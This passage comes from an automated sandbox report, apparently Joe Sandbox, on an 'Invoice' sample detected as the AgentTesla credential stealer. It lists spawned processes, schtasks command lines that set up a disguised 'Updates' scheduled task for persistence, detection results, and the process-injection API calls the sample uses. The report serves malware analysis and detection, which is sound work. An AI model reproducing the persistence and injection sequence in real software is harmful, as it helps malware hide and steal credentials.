Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 34%, ReversingLabs Detection: 43%, Virustotal, Browse
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	11:42:11
Start date:	26/04/2024
Path:	C:\Windows\System32\wbem\WmiPrvSE.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Imagebase:	0x7ff693ab0000
File size:	496'640 bytes
MD5 hash:	60FF40CFD7FB8FE41EE4FE9AE5FE1C51
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	11:42:13
Start date:	26/04/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\kaJNzBnxbXm" /XML "C:\Users\user\AppData\Local\Temp\tmpB8B1.tmp"
Imagebase:	0xc50000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	11:42:13
Start date:	26/04/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	11:42:13
Start date:	26/04/2024
Path:	C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe"
Imagebase:	0xc60000
File size:	841'728 bytes
MD5 hash:	DF0A67F2A0C162C5A5DEE0A8FCD8AB22
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000F.00000002.4154923475.0000000003141000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000F.00000002.4154923475.0000000003141000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000F.00000002.4154923475.000000000318B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	16
Start time:	11:42:21
Start date:	26/04/2024
Path:	C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe"
Imagebase:	0x100000
File size:	841'728 bytes
MD5 hash:	DF0A67F2A0C162C5A5DEE0A8FCD8AB22
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 34%, ReversingLabs Detection: 43%, Virustotal, Browse
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	11:42:23
Start date:	26/04/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\kaJNzBnxbXm" /XML "C:\Users\user\AppData\Local\Temp\tmpE34B.tmp"
Imagebase:	0xc50000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	11:42:23
Start date:	26/04/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	11:42:24
Start date:	26/04/2024
Path:	C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe"
Imagebase:	0x1f0000
File size:	841'728 bytes
MD5 hash:	DF0A67F2A0C162C5A5DEE0A8FCD8AB22
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	11:42:24
Start date:	26/04/2024
Path:	C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe"
Imagebase:	0x7b0000
File size:	841'728 bytes
MD5 hash:	DF0A67F2A0C162C5A5DEE0A8FCD8AB22
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000014.00000002.1937601550.0000000002C3C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000014.00000002.1937601550.0000000002C11000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000014.00000002.1937601550.0000000002C11000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000014.00000002.1933061893.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000014.00000002.1933061893.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000014.00000002.1937601550.0000000002C44000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	11:42:30
Start date:	26/04/2024
Path:	C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe"
Imagebase:	0xa20000
File size:	841'728 bytes
MD5 hash:	DF0A67F2A0C162C5A5DEE0A8FCD8AB22
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	11:42:31
Start date:	26/04/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\kaJNzBnxbXm" /XML "C:\Users\user\AppData\Local\Temp\tmp21D.tmp"
Imagebase:	0xc50000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	11:42:31
Start date:	26/04/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	27
Start time:	11:42:31
Start date:	26/04/2024
Path:	C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe"
Imagebase:	0xc70000
File size:	841'728 bytes
MD5 hash:	DF0A67F2A0C162C5A5DEE0A8FCD8AB22
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001B.00000002.4153454103.0000000002FB1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000001B.00000002.4153454103.0000000002FB1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000001B.00000002.4153454103.0000000002FDC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000001B.00000002.4153454103.0000000002FE4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	9%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	103
Total number of Limit Nodes:	5

Executed Functions

Function 078A23E0 Relevance: .2, Instructions: 231COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1726153462.00000000078A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_78a0000_Invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 76cdad4245645a15ecf6a50b2f6441ac9e3a919b6257ce4090ea970d030e087f
Instruction ID: df2c32670a65b6fd1d487d1ed9e6636b49cdc6745e141484fbd66ae4aacd0688
Opcode Fuzzy Hash: 76cdad4245645a15ecf6a50b2f6441ac9e3a919b6257ce4090ea970d030e087f
Instruction Fuzzy Hash: 2991F3B0D1620DEFDB18CFE5E58099DBBB2FB9A314F20A41AE416BB224D7349945CF14

Uniqueness

Uniqueness Score: -1.00%

Function 078A23D1 Relevance: .2, Instructions: 226COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1726153462.00000000078A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_78a0000_Invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 60b7745efc2e0756a92cf24fdd951b879ed7cade4b04441a86f6ddce58c88b1a
Instruction ID: b1ddb15c4f55ba0865702c4caf7c27dc8cd7045f181ff41b8464541f3b083813
Opcode Fuzzy Hash: 60b7745efc2e0756a92cf24fdd951b879ed7cade4b04441a86f6ddce58c88b1a
Instruction Fuzzy Hash: EC9105B4E16209EFDB18CFE5E58099DFBB2FB9A310F20A41AE416B7224D7349945CF14

Uniqueness

Uniqueness Score: -1.00%

Function 078A20B8 Relevance: .2, Instructions: 204COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1726153462.00000000078A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_78a0000_Invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: be6ef0f3134f355cbf19aa6b8a728f3749e22f01a7b64e276e67f25a1c6e0a4e
Instruction ID: c007a125b2fd8d3fa16d4446c8359dbc6b55bbc00077f872b8dc8fd0cbe61b6f
Opcode Fuzzy Hash: be6ef0f3134f355cbf19aa6b8a728f3749e22f01a7b64e276e67f25a1c6e0a4e
Instruction Fuzzy Hash: 488115B4E1421ADFDB14CFA9D9409EEFBF2FB99300F00A56AE811A7254D734A942CF54

Uniqueness

Uniqueness Score: -1.00%

Function 078A20C8 Relevance: .2, Instructions: 204COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1726153462.00000000078A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_78a0000_Invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: efdffc03697fb383863a8161ba4c44240ba5c350b39f59181017ab96e7769d39
Instruction ID: abb2ae3ad14cb96d371cfaaeb778bcb95064e7f58bb545b7d37ca16c07923bcf
Opcode Fuzzy Hash: efdffc03697fb383863a8161ba4c44240ba5c350b39f59181017ab96e7769d39
Instruction Fuzzy Hash: F18124B4E10219DFDF14CFA9C9809AEFBB2FB99300F10A56AE901B7214D734A942CF54

Uniqueness

Uniqueness Score: -1.00%

Function 0155D368 Relevance: 6.1, APIs: 4, Instructions: 133
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 0155D3F6
GetCurrentThread.KERNEL32 ref: 0155D433
GetCurrentProcess.KERNEL32 ref: 0155D470
GetCurrentThreadId.KERNEL32 ref: 0155D4C9

Memory Dump Source

Source File: 00000000.00000002.1709332875.0000000001550000.00000040.00000800.00020000.00000000.sdmp, Offset: 01550000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1550000_Invoice.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 1f8d4c0df0c92bdfb559a1dc308c2e05f2fb4ab92841a9b48fa5bc4771c81fa5
Instruction ID: 1b46a20022872c7410af2629bb26f64dca2b0d1bc945c78c25d5f19bef6d9655
Opcode Fuzzy Hash: 1f8d4c0df0c92bdfb559a1dc308c2e05f2fb4ab92841a9b48fa5bc4771c81fa5
Instruction Fuzzy Hash: 565164B1900349CFDB54CFA9D548BDEBFF5BF48314F20845AE409AB2A0DB746984CB25

Uniqueness

Uniqueness Score: -1.00%

Function 0155D378 Relevance: 6.1, APIs: 4, Instructions: 128
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 0155D3F6
GetCurrentThread.KERNEL32 ref: 0155D433
GetCurrentProcess.KERNEL32 ref: 0155D470
GetCurrentThreadId.KERNEL32 ref: 0155D4C9

Memory Dump Source

Source File: 00000000.00000002.1709332875.0000000001550000.00000040.00000800.00020000.00000000.sdmp, Offset: 01550000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1550000_Invoice.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 8a83f47dd70101e6f2ca663d004a50af9e5d74228db5a75861389ea4373412ce
Instruction ID: a4ae8b26fe1c19cb6df9880655e7c33e4a9c7441a1e9e7bdb6e67fbdaa2fd75d
Opcode Fuzzy Hash: 8a83f47dd70101e6f2ca663d004a50af9e5d74228db5a75861389ea4373412ce
Instruction Fuzzy Hash: 365153B1900749CFDB54CFAAD548B9EBFF5BF88314F20841AE409AB260DB746984CB65

Uniqueness

Uniqueness Score: -1.00%

Function 078AF915 Relevance: 1.7, APIs: 1, Instructions: 248
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 078AFB56

Memory Dump Source

Source File: 00000000.00000002.1726153462.00000000078A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_78a0000_Invoice.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 1b2202eaabfc4aafccca0ae8a7d772e69df0bf9ce3ee94522d435798ee6543b3
Instruction ID: d55366e3c1cf26985e40beef92a0e1be714f960fb5329a1dfd4c76fa30e2df64
Opcode Fuzzy Hash: 1b2202eaabfc4aafccca0ae8a7d772e69df0bf9ce3ee94522d435798ee6543b3
Instruction Fuzzy Hash: A2A16BB1D0021ADFEB20DF69C841BDDBBB2BF58314F14856AE908E7240DB749985CF91

Uniqueness

Uniqueness Score: -1.00%

Function 078AF920 Relevance: 1.7, APIs: 1, Instructions: 243
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 078AFB56

Memory Dump Source

Source File: 00000000.00000002.1726153462.00000000078A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_78a0000_Invoice.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: f4abfd6d895c1735e08ef1f65bc9bb92305e20a2ec30b62ee920282888a3198d
Instruction ID: 12c76f36ac00f2d410e38c9dfec7b5cea5bf1a61cceac36d85f57e8ddf15d803
Opcode Fuzzy Hash: f4abfd6d895c1735e08ef1f65bc9bb92305e20a2ec30b62ee920282888a3198d
Instruction Fuzzy Hash: A39159B1D0021AEFEB24CFA9C841BDDBBB2BF58314F148569E908E7240DB749985CF91

Uniqueness

Uniqueness Score: -1.00%

Function 0155ACE8 Relevance: 1.7, APIs: 1, Instructions: 197
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 0155AF3E

Memory Dump Source

Source File: 00000000.00000002.1709332875.0000000001550000.00000040.00000800.00020000.00000000.sdmp, Offset: 01550000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1550000_Invoice.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 2c8fe7b9e1a6332d4dc39aab48d999efb609c3485e4dc817fc27dfd411fbdaca
Instruction ID: f44f326e6affe79b8b74b018461d73ea42696d1af09a66d912599a3a065ece7c
Opcode Fuzzy Hash: 2c8fe7b9e1a6332d4dc39aab48d999efb609c3485e4dc817fc27dfd411fbdaca
Instruction Fuzzy Hash: 657147B0A00B058FD764DF69D45075ABBF1FF88304F008A2ED98ADBA50DB75E945CB91

Uniqueness

Uniqueness Score: -1.00%

Function 015544E4 Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 015559A9

Memory Dump Source

Source File: 00000000.00000002.1709332875.0000000001550000.00000040.00000800.00020000.00000000.sdmp, Offset: 01550000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1550000_Invoice.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: a1fad1db599efe51a6c874f47600b0e98e00215d805299111f876d75d5b4f6ec
Instruction ID: 24ae3fb77127e72a3f3e11ef81744249dfd918d47334c3a4086c81443bfea240
Opcode Fuzzy Hash: a1fad1db599efe51a6c874f47600b0e98e00215d805299111f876d75d5b4f6ec
Instruction Fuzzy Hash: 7B41CFB0C10729CBDB24DFA9C984B9EBBF5BF49304F60806AD408AB251DBB56945CF90

Uniqueness

Uniqueness Score: -1.00%

Function 015558EC Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 015559A9

Memory Dump Source

Source File: 00000000.00000002.1709332875.0000000001550000.00000040.00000800.00020000.00000000.sdmp, Offset: 01550000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1550000_Invoice.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 1e326fa21e22dba61878ac0c1cccefb8aa097166b6ad2bdec3664f695d091db0
Instruction ID: dba84384b370dcf3600b00445f9cced2a4a0afe5028ba339be942159e879a24f
Opcode Fuzzy Hash: 1e326fa21e22dba61878ac0c1cccefb8aa097166b6ad2bdec3664f695d091db0
Instruction Fuzzy Hash: 5741CFB0C10719CBDB24DFA9C985B9EBBF5BF49304F20806AD408AB251DB756945CF90

Uniqueness

Uniqueness Score: -1.00%

Function 078AF690 Relevance: 1.6, APIs: 1, Instructions: 70
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 078AF728

Memory Dump Source

Source File: 00000000.00000002.1726153462.00000000078A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_78a0000_Invoice.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 1c7c5e5815b82db2386d1afff8ed9b5d3be2e4309a43dc4c4eff324113036129
Instruction ID: 85f3604c7490e4de474c742ef9f825282251501eb7de657ee866701a6b73e978
Opcode Fuzzy Hash: 1c7c5e5815b82db2386d1afff8ed9b5d3be2e4309a43dc4c4eff324113036129
Instruction Fuzzy Hash: 732146B190034ADFDB10CFA9C981BDEBBF1FF48314F20842AE918A7240D7789954DB60

Uniqueness

Uniqueness Score: -1.00%

Function 078AF698 Relevance: 1.6, APIs: 1, Instructions: 69
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 078AF728

Memory Dump Source

Source File: 00000000.00000002.1726153462.00000000078A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_78a0000_Invoice.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: fe342421accb35ec2a2215c60cddc6e63118974979229c9375a304db0fc521eb
Instruction ID: f05b8aac0ea5ef32ebd8d0e00884d4dcf3c73fa3a52dbe165d0ecf34cd792914
Opcode Fuzzy Hash: fe342421accb35ec2a2215c60cddc6e63118974979229c9375a304db0fc521eb
Instruction Fuzzy Hash: 952125B19003499FDB10CFAAC981BDEBBF5FF48320F10842AE919A7240D7799944DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 078AF782 Relevance: 1.6, APIs: 1, Instructions: 65COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 078AF808

Memory Dump Source

Source File: 00000000.00000002.1726153462.00000000078A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_78a0000_Invoice.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: b7ac9c5e548a6e92d36207c65fbc158fbc213a663624f3ef4f57d1a65b38358a
Instruction ID: e5597fd7678fffbe72c23854438478352f607412e406a24e4c925f24376a705b
Opcode Fuzzy Hash: b7ac9c5e548a6e92d36207c65fbc158fbc213a663624f3ef4f57d1a65b38358a
Instruction Fuzzy Hash: CA2116B19002499FDB10CFAAC881AEEBBF5FF48320F54842AE519A7240C7799551DBA5

Uniqueness

Uniqueness Score: -1.00%

Function 078AEC8A Relevance: 1.6, APIs: 1, Instructions: 65
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 078AED0E

Memory Dump Source

Source File: 00000000.00000002.1726153462.00000000078A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_78a0000_Invoice.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: e8dea834eb2fd71cf3faba12abd15445756057214cefb0f0c89462a48222f86d
Instruction ID: c78617a621f93372abec6f4a911d0bea501821242752492f237e2ed33ba5b525
Opcode Fuzzy Hash: e8dea834eb2fd71cf3faba12abd15445756057214cefb0f0c89462a48222f86d
Instruction Fuzzy Hash: 052168B19003099FDB10CFAAC4857EEBFF4EF58320F14842AD419A7240CB78A944CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0155D5B8 Relevance: 1.6, APIs: 1, Instructions: 64COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0155D647

Memory Dump Source

Source File: 00000000.00000002.1709332875.0000000001550000.00000040.00000800.00020000.00000000.sdmp, Offset: 01550000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1550000_Invoice.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: acad7941d77f1458e0ef76229a399cd738602737f87ec9d78afc4d84cbb49ea4
Instruction ID: 7a8684430998c84dcc3e13149e94ec70f90f3a9fe38d923059cbf1c69b443db7
Opcode Fuzzy Hash: acad7941d77f1458e0ef76229a399cd738602737f87ec9d78afc4d84cbb49ea4
Instruction Fuzzy Hash: E521E5B5900248DFDB10CFAAD585AEEBFF5FB48310F14841AE918A7350D378A940CF65

Uniqueness

Uniqueness Score: -1.00%

Function 078AF788 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 078AF808

Memory Dump Source

Source File: 00000000.00000002.1726153462.00000000078A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_78a0000_Invoice.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: f96cb67dfa613f4c5659bf905b1561eb0a294d0320e6c95b6d6558bb86ce094e
Instruction ID: a4450b33937c5ddd151987a1ad16aa2ac9c1a761ac1b999d2ddd19ed2d9b16bc
Opcode Fuzzy Hash: f96cb67dfa613f4c5659bf905b1561eb0a294d0320e6c95b6d6558bb86ce094e
Instruction Fuzzy Hash: 3E2128B1D003499FDB10CFAAC881ADEFBF5FF48320F10842AE519A7240C7799500DBA5

Uniqueness

Uniqueness Score: -1.00%

Function 078AEC90 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 078AED0E

Memory Dump Source

Source File: 00000000.00000002.1726153462.00000000078A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_78a0000_Invoice.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: a57ead4ed67824e817abe6a75e891c9f0396d108115ab70a86d6ecda12088096
Instruction ID: a5779d8210a0f9ca97c677f46c888d739b97d94026d02a264d57f41fc8aa1a1a
Opcode Fuzzy Hash: a57ead4ed67824e817abe6a75e891c9f0396d108115ab70a86d6ecda12088096
Instruction Fuzzy Hash: 762129B1D003099FDB10DFAAC4857EEBBF4EF58324F14842AD519A7240DB78A945CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 0155D5C0 Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0155D647

Memory Dump Source

Source File: 00000000.00000002.1709332875.0000000001550000.00000040.00000800.00020000.00000000.sdmp, Offset: 01550000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1550000_Invoice.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 433f40bf436a139e9a31bdcbe13b3661b733c506c80fa6f377e4fe3c2a378d7b
Instruction ID: 0108cef3e5f3f78209a4a20066005d4cf40592f68a669c95cc35fbfa43a86457
Opcode Fuzzy Hash: 433f40bf436a139e9a31bdcbe13b3661b733c506c80fa6f377e4fe3c2a378d7b
Instruction Fuzzy Hash: 4321C4B5900249DFDB10CF9AD984ADEBFF9FB48320F14841AE918A7350D379A944CF65

Uniqueness

Uniqueness Score: -1.00%

Function 078AF19A Relevance: 1.6, APIs: 1, Instructions: 55memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 078AF20E

Memory Dump Source

Source File: 00000000.00000002.1726153462.00000000078A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_78a0000_Invoice.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 6c01ec8c4190974aa58031c355b8d6987315faa71f2a7eced4d3655f458a35d1
Instruction ID: 9e7c6c28cd59016a4d595773d7fb88623a709c89914f72308bd50253f1519ce6
Opcode Fuzzy Hash: 6c01ec8c4190974aa58031c355b8d6987315faa71f2a7eced4d3655f458a35d1
Instruction Fuzzy Hash: 3B1159B59002499FDB20CFAAD845BDEBFF5EF48320F248419E519A7250CB759540DFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0155A0A8 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,0155AFB9,00000800,00000000,00000000), ref: 0155B1CA

Memory Dump Source

Source File: 00000000.00000002.1709332875.0000000001550000.00000040.00000800.00020000.00000000.sdmp, Offset: 01550000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1550000_Invoice.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 3c96c436752ee28613a41937558656c77997fdaa4c3f473ee663aa3d52065548
Instruction ID: 0020b68d6b3dfec5cdd8fbc3a3ee26f7507a3fa99a90d4d9e54d0efc2048fe56
Opcode Fuzzy Hash: 3c96c436752ee28613a41937558656c77997fdaa4c3f473ee663aa3d52065548
Instruction Fuzzy Hash: EE11E4B69003499FDB50CF9AC848BDEFBF5FB88310F14842AE919AB600C775A545CFA5

Uniqueness

